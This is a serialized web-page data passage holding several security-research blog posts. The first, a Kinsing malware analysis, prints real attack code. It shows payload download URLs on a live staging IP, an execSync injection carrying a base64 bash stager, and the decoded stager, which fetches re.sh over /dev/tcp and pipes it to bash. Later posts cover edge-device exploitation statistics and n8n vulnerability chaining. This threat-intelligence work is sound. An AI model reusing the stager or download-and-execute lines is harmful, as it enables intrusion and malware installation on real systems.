components:",[1354,10495,10498],{"className":10496,"code":10497,"language":1359},[1357],"BIN_MD5=\"b3039abf2ad5202f4a9363b418002351\"\nBIN_DOWNLOAD_URL=\"http:\u002F\u002F78.153.140.16\u002Fkinsing\"\nBIN_DOWNLOAD_URL2=\"http:\u002F\u002F78.153.140.16\u002Fkinsing\"\nCURL_DOWNLOAD_URL=\"http:\u002F\u002F78.153.140.16\u002Fcurl-amd64\"\n\nSO_FULL_PATH=\"$BIN_PATH\u002F$SO_NAME\"\nSO_DOWNLOAD_URL=\"http:\u002F\u002F78.153.140.16\u002Flibsystem.so\"\nSO_DOWNLOAD_URL2=\"http:\u002F\u002F78.153.140.16\u002Flibsystem.so\"\nSO_MD5=\"ccef46c7edf9131ccffc47bd69eb743b\"\n",[886,10499,10497],{"__ignoreMap":219},[18,10501,10502,10503,10505,10506,10509,10510,10515,10516,10521,10522,10525],{},"What ",[886,10504,10486],{}," downloads and installs is classic Kinsing. The main payload, kinsing, is a Go-based Linux binary. ",[886,10507,10508],{},"libsystem.so"," is the nastier bit. ",[47,10511,10514],{"href":10512,"rel":10513},"https:\u002F\u002Fwww.trendmicro.com\u002Fen_us\u002Fresearch\u002F20\u002Fk\u002Fanalysis-of-kinsing-malwares-use-of-rootkit.html",[51],"Multiple"," ",[47,10517,10520],{"href":10518,"rel":10519},"https:\u002F\u002F1665891.fs1.hubspotusercontent-na1.net\u002Fhubfs\u002F1665891\u002FThreat%20reports\u002FAquaSecurity_Kinsing_Demystified_Technical_Guide.pdf",[51],"sources"," describe Kinsing installing libsystem.so and registering it in ",[886,10523,10524],{},"\u002Fetc\u002Fld.so.preload",", which allows the malware to hide files and network activity inside normal user-space processes, exactly as mt.sh does here. That means this script is not just dropping an old bot. It is dropping the familiar Kinsing combination of payload, persistence, and stealth.",[18,10527,10528,10529,10534],{},"At this point, the Canary Intelligence team saw the Metabase and ActiveMQ activity as the return of Kinsing on fresh infrastructure. What made the cluster even more interesting was that Kinsing had one more CVE to add: ",[47,10530,10533],{"href":10531,"rel":10532},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-55182",[51],"CVE-2025-55182"," (React2Shell).",[18,10536,10537],{},[68,10538],{"alt":10539,"src":10540,"style":10541},"And my axe!","\u002Fblog\u002Freturn-of-the-kinsing\u002Fgimli.png","width: 70%; height: auto; margin-left: auto; margin-right: auto;",[18,10543,10544,10545,10548,10549,982,10552,10555,10556,59],{},"We can tie this activity to Kinsing because the attacker IP, ",[886,10546,10547],{},"212.113.98.30",", is the same address we observed exploiting ",[47,10550,10429],{"href":10427,"rel":10551},[51],[47,10553,10435],{"href":10433,"rel":10554},[51],", both of which led to the same staging infrastructure at ",[886,10557,10558],{},"78.153.140.16",[18,10560,10561,10562,10565,10566,10569],{},"For brevity, we focus here on the command-execution portion of the ",[47,10563,10533],{"href":10531,"rel":10564},[51]," payload. Using the vulnerability’s JavaScript execution primitive, Kinsing invokes ",[886,10567,10568],{},"child_process.execSync(...)"," to decode and run the following bash stager.",[1354,10571,10574],{"className":10572,"code":10573,"language":1359},[1357],"process.mainModule.require('child_process').execSync('echo IyEvYmluL2Jhc2gKZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8JChlY2hvICR7MS8vLy8gfSkKICBET0M9LyR7cGF0aC8vIC8vfQogIEhPU1Q9JHtzZXJ2ZXIvLzoqfQogIFBPUlQ9JHtzZXJ2ZXIvLyo6fQogIFtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCgogIGV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAogIGVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcbkhvc3Q6ICR7SE9TVH1cclxuXHJcbiIgPiYzCiAgKHdoaWxlIHJlYWQgbGluZTsgZG8KICAgW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawogIGRvbmUgJiYgY2F0KSA8JjMKICBleGVjIDM+Ji0KfQoKX19jdXJsIGh0dHA6Ly83OC4xNTMuMTQwLjE2L3JlLnNofGJhc2g=|base64 -d|bash')\n",[886,10575,10573],{"__ignoreMap":219},[18,10577,10578],{},"For readability, the base64-decoded stager is shown below.",[1354,10580,10583],{"className":10581,"code":10582,"language":1359},[1357],"#!\u002Fbin\u002Fbash\nfunction __curl() {\n read proto server path \u003C\u003C\u003C$(echo ${1\u002F\u002F\u002F\u002F })\n DOC=\u002F${path\u002F\u002F \u002F\u002F}\n HOST=${server\u002F\u002F:*}\n PORT=${server\u002F\u002F*:}\n [[ x\"${HOST}\" == x\"${PORT}\" ]] && PORT=80\n\n exec 3\u003C>\u002Fdev\u002Ftcp\u002F${HOST}\u002F$PORT\n echo -en \"GET ${DOC} HTTP\u002F1.0\\r\\nHost: ${HOST}\\r\\n\\r\\n\" >&3\n (while read line; do\n [[ \"$line\" == $'\\r' ]] && break\n done && cat) \u003C&3\n exec 3>&-\n}\n\n__curl http:\u002F\u002F78.153.140.16\u002Fre.sh|bash\n",[886,10584,10582],{"__ignoreMap":219},[18,10586,10587,10588,10591,10592,10594,10595,10598],{},"The stager is crude, but effective. Instead of relying on host utilities like curl or wget, it uses bash’s \u002Fdev\u002Ftcp subsystem to fetch ",[886,10589,10590],{},"re.sh"," directly from ",[886,10593,10558],{}," and execute it in memory. That is the important part: ",[47,10596,10533],{"href":10531,"rel":10597},[51]," exploitation points to the same staging infrastructure. When we compared re.sh to the other Kinsing stagers in this cluster, the differences were minimal. In other words, there was nothing new here. This was just another tool in the Kinsing toolbox.",[18,10600,10601,10602,1246,10605,10608],{},"This is exactly the kind of clustering Canary Intelligence is good at surfacing. Exploitation of ",[47,10603,10429],{"href":10427,"rel":10604},[51],[47,10606,10435],{"href":10433,"rel":10607},[51],", and CVE-2025-55182 all led back to the same infrastructure. If nothing else, it is a reminder that older malware families do not need new binaries to stay relevant. Sometimes they just need one more CVE.",[61,10610,10612],{"id":10611},"indicators-of-compromise","Indicators of Compromise",[307,10614,10615,10626],{},[310,10616,10617],{},[313,10618,10619,10621,10623],{},[316,10620,2123],{},[316,10622,2126],{},[316,10624,10625],{},"Description",[336,10627,10628,10638,10648,10659,10670,10682,10697,10710,10723,10737,10750],{},[313,10629,10630,10633,10635],{},[341,10631,10632],{},"Attacker IP",[341,10634,10547],{},[341,10636,10637],{},"Exploitation node",[313,10639,10640,10643,10645],{},[341,10641,10642],{},"Staging Host",[341,10644,10558],{},[341,10646,10647],{},"Shared staging infrastructure",[313,10649,10650,10652,10656],{},[341,10651,2170],{},[341,10653,10654],{},[886,10655,10480],{},[341,10657,10658],{},"ActiveMQ delivery artifact",[313,10660,10661,10663,10667],{},[341,10662,2170],{},[341,10664,10665],{},[886,10666,10476],{},[341,10668,10669],{},"Metabase stager",[313,10671,10672,10674,10679],{},[341,10673,2170],{},[341,10675,10676],{},[886,10677,10678],{},"http:\u002F\u002F78.153.140.16\u002Fre.sh",[341,10680,10681],{},"CVE-2025-55182 stager",[313,10683,10684,10687,10694],{},[341,10685,10686],{},"SHA1",[341,10688,10689],{},[47,10690,10693],{"href":10691,"rel":10692},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fe60e7bd42ea0fd29523f6f27dc8005b6a5c68f23d105fd3952b0275b30325f18",[51],"596470fd9031b76eddde02568f7d5dee7a66a910",[341,10695,10696],{},"acb.xml",[313,10698,10699,10701,10708],{},[341,10700,10686],{},[341,10702,10703],{},[47,10704,10707],{"href":10705,"rel":10706},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Ff65fba5d584c265f92c3628ed8f3c05c5d0c65fc9947d1af907a2df49fea5cf6",[51],"df7367261598cfed1fca9fd11504071937f38350",[341,10709,10486],{},[313,10711,10712,10714,10721],{},[341,10713,10686],{},[341,10715,10716],{},[47,10717,10720],{"href":10718,"rel":10719},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fafc7822d9e561982f5ed22faf76b35ad4b432eaa6cac0cd0fcafc9e67314a8fd",[51],"53a1aed3075140e6bc568f093b1f5a151ecc7dc9",[341,10722,10590],{},[313,10724,10725,10727,10734],{},[341,10726,10686],{},[341,10728,10729],{},[47,10730,10733],{"href":10731,"rel":10732},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3",[51],"6feb75ac62120bae1e92ab16184c1eb0b795e4b3",[341,10735,10736],{},"curl-amd64",[313,10738,10739,10741,10748],{},[341,10740,10686],{},[341,10742,10743],{},[47,10744,10747],{"href":10745,"rel":10746},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fc38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a",[51],"38c56b5e1489092b80c9908f04379e5a16876f01",[341,10749,10508],{},[313,10751,10752,10754,10761],{},[341,10753,10686],{},[341,10755,10756],{},[47,10757,10760],{"href":10758,"rel":10759},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c",[51],"0ceb8ffb0be23b808b534d744440f4367e17b9c5",[341,10762,10763],{},"kinsing",[61,10765,202],{"id":201},[18,10767,10768,10769,1246,10772,10775,10776,10779,10780,1246,10787,1246,10794,59],{},"VulnCheck’s research team tracks real-world exploitation, attacker infrastructure, and exploit workflows using our ",[47,10770,283],{"href":281,"rel":10771},[51],[47,10773,216],{"href":1258,"rel":10774},[51]," (EVI), and ",[47,10777,1251],{"href":1249,"rel":10778},[51]," datasets. For more research like this check out our blogs, ",[47,10781,10784],{"href":10782,"rel":10783},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Ffrost-checks-first",[51],[1131,10785,10786],{},"Frost Checks First",[47,10788,10791],{"href":10789,"rel":10790},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fmystery-oast",[51],[1131,10792,10793],{},"The Mystery OAST Host Behind a Regionally Focused Exploit Operation",[47,10795,10798,10799],{"href":10796,"rel":10797},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fxwiki-under-increased-attack",[51],"and ",[1131,10800,10801],{},"XWiki Under Increased Attack",[18,10803,1228,10804,1234,10808,1240,10811,1246,10814,1246,10817,1255,10820,1260],{},[47,10805,1233],{"href":10806,"rel":10807},"https:\u002F\u002Fconsole.vulncheck.com\u002Fbrowse\u002Fkev",[51],[47,10809,1239],{"href":1237,"rel":10810},[51],[47,10812,1245],{"href":1243,"rel":10813},[51],[47,10815,1251],{"href":1249,"rel":10816},[51],[47,10818,283],{"href":281,"rel":10819},[51],[47,10821,216],{"href":1258,"rel":10822},[51],{"title":219,"searchDepth":220,"depth":220,"links":10824},[10825,10826],{"id":10611,"depth":220,"text":10612},{"id":201,"depth":220,"text":202},"2026-03-26T09:00:00-05:00","Canary Intelligence linked exploitation of CVE-2023-46604, CVE-2023-38646, and CVE-2025-55182 to the same Kinsing infrastructure, including a shared staging host and attacker IP first seen in the canary network on March 12, 2026. The research shows how an older malware family is still adapting by adding new exploit paths while continuing to rely on established infrastructure.",{"slug":10830},"return-of-the-kinsing","\u002Fblog\u002Freturn-of-the-kinsing",{"title":10388,"description":10828},"blog\u002Freturn-of-the-kinsing",[242,2941,1281,1279],"UwjNk-7ieJc5weQ6FsEnKNEP54TZOyHkrJNlX6_MKPA",{"id":10837,"title":1218,"articles":10838,"authors":10854,"body":10856,"date":10951,"description":10952,"extension":234,"image":7,"link":7,"meta":10953,"navigation":237,"path":10955,"seo":10956,"series":7,"stem":10957,"subtype":7,"tags":10958,"__hash__":10959},"blog\u002Fblog\u002Fnetwork-edge-device-report-2026.md",[10839,10844,10847,10850],{"title":10840,"source":10841,"link":10842,"date":10843},"Network edge devices still widely used after reaching end-of-life status","Cybersecurity Dive","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fnetwork-edge-devices-still-widely-used-after-reaching-end-of-life-status\u002F815403\u002F","2026-03-23",{"title":10840,"source":10845,"link":10846,"date":10843},"Yahoo","https:\u002F\u002Fwww.yahoo.com\u002Fnews\u002Farticles\u002Fnetwork-edge-devices-still-widely-095558259.html?guccounter=1",{"title":10848,"source":10841,"link":10849,"date":4027},"FCC bans import of consumer-grade routers amid national security concerns","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Ffcc-bans-import-consumer-grade-routers-national-security\u002F815528\u002F",{"title":10851,"source":3495,"link":10852,"date":10853},"Risky Bulletin Newsletter","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-the-intellexa-ceo-is-pissed\u002F","2026-03-25",[10855],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":10857,"toc":10946},[10858,10865,10868,10871,10884,10893,10898,10902,10919,10922,10925,10929,10932,10935,10937,10939,10941],[18,10859,10860],{},[68,10861],{":width":10862,"alt":10863,"src":10864},"100%","Network Edge Device Report","\u002Fblog\u002Fnetwork-edge-device-report-2026\u002Fnetwork-edge-device-kevs-2025-eol.png",[18,10866,10867],{},"When I started researching network edge devices with evidence of exploitation in VulnCheck KEV, I wanted to better understand what was actually being targeted. Specifically, I was interested in the types of devices being exploited, whether they were still supported, and how attackers are using them.",[18,10869,10870],{},"That led me to dig deeper into questions like consumer versus enterprise devices, where vendors are headquartered, and which device types are targeted by botnets versus ransomware. What started as a quick blog post quickly grew into something much larger. The research expanded beyond what typically fits in a blog, so we decided to turn it into a full report as part of our 2026 State of Exploitation research.",[10872,10873],"u-button",{":external":10874,"className":10875,"label":10880,"target":10881,"to":10882,"variant":10883},"true",[10876,10877,10878,10879],"block","mx-auto","w-48","text-center","Download the full report","_blank","https:\u002F\u002Fwwv.vulncheck.com\u002F2026-network-edge-device-report","gradient",[18,10885,10886,10887,10892],{},"The timing of this report also aligns with CISA’s recently released Binding Operational Directive, ",[47,10888,10891],{"href":10889,"rel":10890,":target":10881},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fdirectives\u002Fbod-26-02-mitigating-risk-end-support-edge-devices",[51],"BOD 26-02: Mitigating Risk From End of Support Edge Devices",". That raised an important question for me. Can broader exploitation evidence of end of life devices help defenders gain better visibility into the risks in their own environments?",[18,10894,10895],{},[68,10896],{":width":10862,"alt":10863,"src":10897},"\u002Fblog\u002Fnetwork-edge-device-report-2026\u002Fnetwork-edge-device-kevs-2025.png",[61,10899,10901],{"id":10900},"key-findings-from-the-report","Key Findings From the Report",[22,10903,10904,10907,10910,10913,10916],{},[25,10905,10906],{},"42.5 percent of vulnerabilities exploited in 2025 affected devices that are end of life or likely end of life, with additional vulnerabilities impacting products that have already reached end of sale",[25,10908,10909],{},"Consumer networking equipment is a major exploitation target. Consumer routers and globally distributed networking products account for 56 percent of exploited edge device vulnerabilities",[25,10911,10912],{},"Botnets disproportionately target unsupported devices. 65 percent of vulnerabilities exploited by botnets affect end of life or likely end of life products",[25,10914,10915],{},"Many exploited edge device vulnerabilities are not represented in CISA KEV. Only 23.7 percent of the vulnerabilities identified by VulnCheck appear in CISA KEV",[25,10917,10918],{},"Active exploitation frequently precedes CVE assignment. VulnCheck issued CVEs for 18 vulnerabilities after detecting exploitation activity through honeypots and canary systems",[18,10920,10921],{},"I hope you enjoy this exploration into network edge device exploitation.",[18,10923,10924],{},"Cheers,\nPatrick Garrity",[61,10926,10928],{"id":10927},"read-the-full-report","Read the Full Report",[18,10930,10931],{},"This research is part of our broader State of Exploitation 2026 series, where we analyze real world exploitation trends using VulnCheck KEV and additional VulnCheck threat intelligence.",[10872,10933],{":external":10874,"className":10934,"label":10880,"target":10881,"to":10882,"variant":10883},[10876,10877,10878,10879],[61,10936,202],{"id":201},[18,10938,205],{},[18,10940,208],{},[18,10942,211,10943,217],{},[47,10944,216],{"href":214,"rel":10945},[51],{"title":219,"searchDepth":220,"depth":220,"links":10947},[10948,10949,10950],{"id":10900,"depth":220,"text":10901},{"id":10927,"depth":220,"text":10928},{"id":201,"depth":220,"text":202},"2026-03-23T09:00:00-05:00","What’s really being targeted at the network edge? VulnCheck’s 2026 research shows that a significant portion of exploited vulnerabilities affect end-of-life devices, with consumer networking equipment and botnets driving much of the activity. This report breaks down the trends shaping real-world exploitation.",{"slug":10954},"network-edge-device-report-2026","\u002Fblog\u002Fnetwork-edge-device-report-2026",{"title":1218,"description":10952},"blog\u002Fnetwork-edge-device-report-2026",[1280,1279],"82BdCT1uDIYlq82o_ZbFJHdYfI6_968Hn_xFjDLniF8",{"id":10961,"title":10962,"articles":10963,"authors":10970,"body":10972,"date":11203,"description":11204,"extension":234,"image":7,"link":7,"meta":11205,"navigation":237,"path":11207,"seo":11208,"series":7,"stem":11209,"subtype":7,"tags":11210,"__hash__":11212},"blog\u002Fblog\u002Fn8n-needs-more-kev.md","n8n Should Have More Than One CISA KEV Entry",[10964,10966],{"title":10851,"source":3495,"link":10965,"date":10843},"https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-github-is-starting-to-have-a-real-malware-problem\u002F",{"title":10967,"source":3508,"link":10968,"date":10969},"Newsletter #90","https:\u002F\u002Fwww.resilientcyber.io\u002Fp\u002Fresilient-cyber-newsletter-90","2026-03-27",[10971],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":10973,"toc":11195},[10974,10977,10981,10995,11010,11013,11017,11048,11056,11060,11090,11093,11097,11106,11109,11112,11116,11119,11122,11127,11132,11135,11140,11144,11147,11149,11175],[263,10975],{":list":10976,"ico":266,"title":20},"[\"CVE-2025-68613 was added to CISA KEV as an authenticated RCE, but it can be paired with CVE-2026-21858 to bypass authentication.\",\"CVE-2026-21858 is not included in CISA KEV, despite strong evidence it is being exploited in the wild and enables unauthenticated RCE.\",\"Over 14,000 n8n instances remain vulnerable, suggesting the real-world risk is not reflected in CISA KEV.\"]",[61,10978,10980],{"id":10979},"technical-reality","Technical Reality",[18,10982,10983,10984,10989,10990,10994],{},"On March 11, 2026, CISA added ",[47,10985,10988],{"href":10986,"rel":10987},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-68613",[51],"CVE-2025-68613"," to its ",[47,10991,10993],{"href":2864,"rel":10992},[51],"Known Exploited Vulnerability Catalog",". The vulnerability affects n8n (pronounced en-eight-en), a workflow automation platform, and requires authentication. That requirement alone is enough for many to dismiss the issue. Doing so would be a mistake because the KEV entry lacks important context.",[18,10996,10997,10998,11003,11004,11009],{},"There is an authentication bypass. CVE-2025-68613 can be paired with CVE-2026-21858 to achieve unauthenticated remote code execution, as demonstrated in a public ",[47,10999,11002],{"href":11000,"rel":11001},"https:\u002F\u002Fgithub.com\u002FChocapikk\u002FCVE-2026-21858",[51],"proof of concept"," developed by our prolific friend ",[47,11005,11008],{"href":11006,"rel":11007},"https:\u002F\u002Fgithub.com\u002FChocapikk",[51],"Chocapikk",". These vulnerabilities can be combined across versions from 1.65.0 (October 2024) through 1.121.0 (November 2025), significantly expanding the pool of exploitable targets.",[18,11011,11012],{},"If CVE-2025-68613, a vulnerability that nominally requires authentication, is being exploited in the wild, it is reasonable to assume it is being paired with CVE-2026-21858, which removes that barrier entirely. This is not just missing context in CISA KEV, it points to a second vulnerability that likely deserves its own KEV entry.",[61,11014,11016],{"id":11015},"observed-exploitation","Observed Exploitation",[18,11018,11019,11020,982,11025,11030,11031,11036,11037,982,11042,11047],{},"We don’t have to assume this chaining is happening. There is clear evidence that CVE-2026-21858 is being exploited in the wild. VulnCheck Canary Intelligence has observed exploitation against n8n canaries, with particularly high volume from 185.177.72.30. ",[47,11021,11024],{"href":11022,"rel":11023},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fvulnerability\u002Fmap\u002F?day=2026-03-16&host_type=src&vulnerability=cve-2026-21858",[51],"Shadowserver",[47,11026,11029],{"href":11027,"rel":11028},"https:\u002F\u002Fviz.greynoise.io\u002Ftags\u002Fn8n-arbitrary-file-access-cve-2026-21858-attempt",[51],"GreyNoise"," report consistent daily exploitation attempts, and honeypot observations, including from ",[47,11032,11035],{"href":11033,"rel":11034},"https:\u002F\u002Fbeelzebub.ai\u002Fblog\u002Fcatching-ni8mare-in-the-wild-cve-2026-21858\u002F",[51],"Beelzebub",", further confirm in-the-wild activity. Public ",[47,11038,11041],{"href":11039,"rel":11040},"https:\u002F\u002Fgithub.com\u002Fsec-dojo-com\u002FCVE-2026-21858",[51],"proof-of-concepts",[47,11043,11046],{"href":11044,"rel":11045},"https:\u002F\u002Fwww.cyera.com\u002Fresearch\u002Fni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858",[51],"blog"," posts demonstrate how the vulnerability can be used in practice.",[18,11049,11050,11051,11055],{},"This activity led to CVE-2026-21858 being added to the ",[47,11052,1233],{"href":11053,"rel":11054},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2026-21858",[51]," on January 9, 2026. In other words, the capability needed to turn CVE-2025-68613 into unauthenticated RCE was already being actively exploited when the CISA KEV entry was created.",[61,11057,11059],{"id":11058},"adversary-behavior","Adversary Behavior",[18,11061,11062,11063,11068,11069,11073,11074,1246,11079,1255,11084,11089],{},"The CISA KEV entry also fails to provide context on who is conducting the exploitation. ",[47,11064,11067],{"href":11065,"rel":11066},"https:\u002F\u002Fctrlaltintel.com\u002Fthreat%20research\u002FMuddyWater\u002F",[51],"Reporting"," has linked exploitation of CVE-2025-68613 to ",[47,11070,935],{"href":11071,"rel":11072},"https:\u002F\u002Fmalpedia.caad.fkie.fraunhofer.de\u002Factor\u002Fmuddywater",[51]," (also known as ",[47,11075,11078],{"href":11076,"rel":11077},"https:\u002F\u002Fwww.crowdstrike.com\u002Fen-us\u002Fadversaries\u002Fstatic-kitten\u002F",[51],"Static Kitten",[47,11080,11083],{"href":11081,"rel":11082},"https:\u002F\u002Fattack.mitre.org\u002Fgroups\u002FG0069\u002F",[51],"G0069",[47,11085,11088],{"href":11086,"rel":11087},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2022\u002F06\u002F02\u002Fexposing-polonium-activity-and-infrastructure-targeting-israeli-organizations\u002F",[51],"Mango Sandstorm","), an Iranian state-sponsored group known for exploiting a wide range of vulnerabilities across internet-facing systems.",[18,11091,11092],{},"Notably, the activity described involves scanning for and exploiting multiple CVEs at scale. In that context, it is unclear how a requirement for valid authentication would be reliably satisfied. This further supports the case that CVE-2025-68613 is unlikely to be exploited as a strictly authenticated vulnerability and that related issues enabling unauthenticated access warrant separate consideration in KEV.",[61,11094,11096],{"id":11095},"but-wait-theres-more","But Wait! There’s More",[18,11098,11099,11100,11105],{},"It’s also worth noting that if attackers are using valid credentials to exploit CVE-2025-68613, they would benefit from the fact that the initial patch was bypassed and later addressed as CVE-2026-25049. As shown by ",[47,11101,11104],{"href":11102,"rel":11103},"https:\u002F\u002Ffatihhcelik.github.io\u002Fposts\u002Fn8n-RCEs-A-Tale-of-4-Acts\u002F",[51],"Fatih Celik",", the original issue can be bypassed in multiple ways, which attackers would likely continue to leverage where possible.",[18,11107,11108],{},"Additionally, CVE-2026-21858 is not limited to pairing with CVE-2025-68613. Other post-authentication vulnerabilities, including CVE-2026-1470, CVE-2026-0863, and CVE-2026-21877, provide additional paths to exploitation once access is obtained.",[18,11110,11111],{},"The common denominator across these scenarios is the ability to bypass authentication entirely. That capability, not any single post-authentication issue, is what should be represented in CISA KEV.",[61,11113,11115],{"id":11114},"exposure-remains-relatively-high","Exposure Remains Relatively High",[18,11117,11118],{},"To the point that defenders often deprioritize authenticated issues, our Target Intelligence has scanned the internet and identified over 14,000 exposed endpoints still vulnerable to CVE-2025-68613. With the availability of authentication bypasses and evidence that APT groups like MuddyWater are actively exploiting these systems, patching should be treated as urgent, not optional.",[18,11120,11121],{},"Exposure spans 96 countries, with the majority concentrated in the United States.",[1925,11123,11124],{},[18,11125,11126],{},"Top n8n Installs By Country (March 17, 2026)",[11128,11129],"bar-chart",{":labels":11130,":values":11131},"[\"US\",\"DE\",\"SG\",\"FR\",\"VN\",\"IN\",\"BR\",\"NL\",\"AU\",\"GB\"]","[8834,1743,1268,1130,1045,1045,873,762,697,612]",[18,11133,11134],{},"Exposed versions are similarly widespread, though many deployments remain on versions released around 1.110.",[1925,11136,11137],{},[18,11138,11139],{},"Top n8n Versions in the Wild (March 17, 2026)",[11128,11141],{":labels":11142,":values":11143},"[\"1.113.3\",\"1.115.3\",\"1.110.1\",\"1.106.3\",\"1.116.2\",\"1.107.4\",\"1.114.4\",\"1.108.2\",\"1.111.0\",\"1.109.2\"]","[1051,991,967,890,889,745,698,659,617,617]",[18,11145,11146],{},"In other words, this is not a niche issue. It is a widely exposed and actively exploited attack surface. That reality is not reflected in CISA KEV, but it is captured in VulnCheck KEV. At a minimum, the authentication bypass enabling these attack paths warrants its own KEV entry.",[61,11148,202],{"id":201},[18,11150,10768,11151,1246,11154,10775,11157,10779,11160,1246,11165,1246,11170,59],{},[47,11152,283],{"href":281,"rel":11153},[51],[47,11155,216],{"href":1258,"rel":11156},[51],[47,11158,1251],{"href":1249,"rel":11159},[51],[47,11161,11163],{"href":10782,"rel":11162},[51],[1131,11164,10786],{},[47,11166,11168],{"href":10789,"rel":11167},[51],[1131,11169,10793],{},[47,11171,10798,11173],{"href":10796,"rel":11172},[51],[1131,11174,10801],{},[18,11176,1228,11177,1234,11180,1240,11183,1246,11186,1246,11189,1255,11192,1260],{},[47,11178,1233],{"href":10806,"rel":11179},[51],[47,11181,1239],{"href":1237,"rel":11182},[51],[47,11184,1245],{"href":1243,"rel":11185},[51],[47,11187,1251],{"href":1249,"rel":11188},[51],[47,11190,283],{"href":281,"rel":11191},[51],[47,11193,216],{"href":1258,"rel":11194},[51],{"title":219,"searchDepth":220,"depth":220,"links":11196},[11197,11198,11199,11200,11201,11202],{"id":10979,"depth":220,"text":10980},{"id":11015,"depth":220,"text":11016},{"id":11058,"depth":220,"text":11059},{"id":11095,"depth":220,"text":11096},{"id":11114,"depth":220,"text":11115},{"id":201,"depth":220,"text":202},"2026-03-20","CISA recently added CVE-2025-68613, an authenticated n8n RCE, to its KEV catalog, but that framing misses how the vulnerability is actually exploited. In practice, it can be paired with CVE-2026-21858, an authentication bypass that is already being actively exploited in the wild. With over 14,000 exposed n8n instances, this attack path is both practical and widespread. The bypass enabling these chains likely warrants its own KEV entry.",{"slug":11206},"n8n-needs-more-kev","\u002Fblog\u002Fn8n-needs-more-kev",{"title":10962,"description":11204},"blog\u002Fn8n-needs-more-kev",[242,2941,1281,1279,11211],"target-intel","-ljYIoujw4H81oKwEBAbMBB6nW6jwcG6X5KTOTlhVGQ",{"id":11214,"title":10334,"articles":11215,"authors":11239,"body":11247,"date":11629,"description":11630,"extension":234,"image":7,"link":7,"meta":11631,"navigation":237,"path":11633,"seo":11634,"series":7,"stem":11635,"subtype":7,"tags":11636,"__hash__":11637},"blog\u002Fblog\u002Fcisco-sd-wan-manager-vulns.md",[11216,11221,11224,11226,11231,11235],{"title":11217,"source":11218,"link":11219,"date":11220},"Fake PoCs, Misunderstood Risks Cause Cisco SD-WAN Chaos","Dark Reading","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Ffake-pocs-risks-cisco-sd-wan","2026-03-13",{"title":11222,"source":3495,"link":11223,"date":11220},"Risky Bulletin: Meta disrupts Mexican cartels","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-meta-disrupts-mexican-cartels\u002F",{"title":10851,"source":3495,"link":11223,"date":11225},"2026-03-16",{"title":11227,"source":11228,"link":11229,"date":11230},"Cisco’s latest vulnerability spree has a more troubling pattern underneath","CyberScoop","https:\u002F\u002Fcyberscoop.com\u002Fcisco-firewall-sd-wan-vulnerabilities-exploited\u002F","2026-03-18",{"title":11232,"source":11233,"link":11234,"date":11230},"VulnCheck: Threat of high-severity Cisco SD-WAN bug potentially missed","SC Media","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fvulncheck-threat-of-high-severity-cisco-sd-wan-bug-potentially-missed",{"title":11236,"source":10841,"link":11237,"date":11238},"CISA confirms exploitation of 3 more Cisco networking device vulnerabilities","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fcisa-cisco-vulnerabilities-sd-wan-confirm-exploitation\u002F818064\u002F","2026-04-21",[11240,11245],{"name":11241,"avatar":11242,"link":11243,"linkName":11244},"Josh Shomo","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U07L2A49Y57-6bcc4b5ac7b3-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fjosh-shomo-5260bb259\u002F","in\u002Fjosh-shomo-5260bb259",{"name":256,"avatar":257,"link":258,"linkName":11246},"in\u002Fccondon",{"type":15,"value":11248,"toc":11622},[11249,11251,11262,11264,11267,11270,11274,11303,11310,11354,11476,11488,11507,11511,11528,11550,11578,11584,11586,11589,11591,11605],[61,11250,20],{"id":3520},[22,11252,11253,11256,11259],{},[25,11254,11255],{},"Over the past two weeks, Cisco has disclosed half a dozen new vulnerabilities in Catalyst SD-WAN Manager, half of which are now known to be exploited in the wild.",[25,11257,11258],{},"Community interest has centered on CVE-2026-20127, a zero-day authentication bypass exploited by UAT-8616; initial public proof-of-concept code for CVE-2026-20127 was misattributed and will lead to incomplete detections.",[25,11260,11261],{},"The VulnCheck research team assesses that CVE-2026-20133 is a higher risk than defenders may realize, and is likely to be exploited — if exploitation isn’t already ongoing under the radar.",[1308,11263],{},[18,11265,11266],{},"In response to customer requests, the VulnCheck Initial 